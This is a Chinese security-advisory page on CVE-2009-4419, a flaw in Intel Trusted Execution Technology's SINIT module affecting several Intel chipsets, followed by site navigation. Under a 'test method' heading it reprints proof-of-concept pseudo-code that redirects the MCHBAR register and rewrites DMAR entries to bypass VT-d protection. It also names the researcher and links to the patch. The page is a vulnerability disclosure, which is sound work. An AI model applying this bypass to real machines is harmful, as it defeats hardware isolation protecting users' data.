Intel可信执行技术SINIT ACM本地权限提升漏洞
受影响系统:
Intel Q35
Intel GM45
Intel PM45 Express
Intel Q45
Intel Q43 Express
描述:BUGTRAQ ID: 37430
CVE ID: CVE-2009-4419
英特尔可信执行技术是英特尔酷睿2双核处理器E8400中的一项硬件延展技术,旨在保护虚拟化计算环境中的数据免遭软件攻击、病毒入侵及其它类型威胁。
多个Intel芯片组的SINIT认证代码模块(ACM)中存在错误配置,允许本地用户将MCHBAR寄存器修改为指向受控的区域,在加载MLE期间SENTER指令无法正确地应用VT-d保护,以绕过可信执行技术的保护机制。
<*来源:Alexander Tereshkin
链接:http://secunia.com/advisories/37900/
http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00021&languageid=en-fr
http://invisiblethingslab.com/resources/misc09/Another%20TXT%20Attack.pdf
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#define ETH_MEM 0xfef00000
#define FAKE_MCHBAR (ETH_MEM+0x10000)
#define NEW_MCHBAR ((1ULL<<32) +
FAKE_MCHBAR)
// map some memory above 0xfec00000...
pci_write_long (ETH_DEV, MBARA_REG,
ETH_MEM)
// copy original MCHBAR region there...
MCHBAR = pci_read_long (MCH_DEV,
MCHBAR_REG);
memcpy (FAKE_MCHBAR, MCHBAR&~1, 0x4000);
// do the trick!
DMAR = get_acpi_dmar_base();
DMAR.DRHD[3].BAR = DMAR.DRHD[0].BAR
*(FAKE_MCHBAR + 0xdc0) = DMAR.DRHD[3].BAR
// update MCHBAR...
pci_write_longlong (MCH_DEV, MCHBAR_REG,
NEW_MCHBAR | 0x1)
建议:厂商补丁:
Intel
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://sourceforge.net/projects/tboot/files/
- Apache Tomcat Windows安装程序默认空口令漏
- UCenter 的安全漏洞
- OpenLDAP CA SSL证书验证漏洞
- (MS09-051)Microsoft Windows Media Runtime文件压
- Hyperic HQ跨站脚本和脚本注入漏洞
- (MS09-064)Microsoft Windows License Logging服务
- Linux Kernel 64位内核寄存器内存泄露漏洞
- Microsoft IE 8不安全跨站脚本过滤漏洞
- Kaspersky Anti-Virus kl1.sys驱动本地拒绝服
- (MS09-052)Microsoft Windows Media Player ASF文件
相关热点
更多相关
- Apache Tomcat Windows安装程序默认空口令漏
- UCenter 的安全漏洞
- OpenLDAP CA SSL证书验证漏洞
- (MS09-051)Microsoft Windows Media Runtime文件压
- Hyperic HQ跨站脚本和脚本注入漏洞
- (MS09-064)Microsoft Windows License Logging服务
- Linux Kernel 64位内核寄存器内存泄露漏洞
- Microsoft IE 8不安全跨站脚本过滤漏洞
- Kaspersky Anti-Virus kl1.sys驱动本地拒绝服
- (MS09-052)Microsoft Windows Media Player ASF文件
- (MS10-002)Microsoft IE表格布局Col标签缓存
- FreeBSD fifo_vnops.c资源泄漏本地拒绝服务
常见问题
- 探究NFS服务器的安全问题
- 全新的视角,全面了解您的服务器机房
- 配置路由器为TFTP服务器
- 防火墙设定路由访存表防止黑客入侵
- 黑客攻防:系统防入侵全攻略
- 极虎病毒如何查杀?
- 服务器为什么要做双机热备?
- 浅析网络安全审计原理和技术
服务项目
- 服务器安全维护服务
- 服务器安全加固服务
- 服务器安全评估服务
- 服务器安全设置服务
- 服安信息安全技术培训
- 服务器安全维护包年
- 服务器入侵检测服务
- 反黑、反DDOS攻击专案
- 服务器安全应急响应
- 网站入侵检测服务
成功案例
联系我们
- 专家信箱:sec@serversteam.com
- 专家热线:13542743816
- 安全客服:0755-82894338
- 应急传真:0755-82894338
- 地址:深圳市福田区群星广场A座
安全应急响应中心:


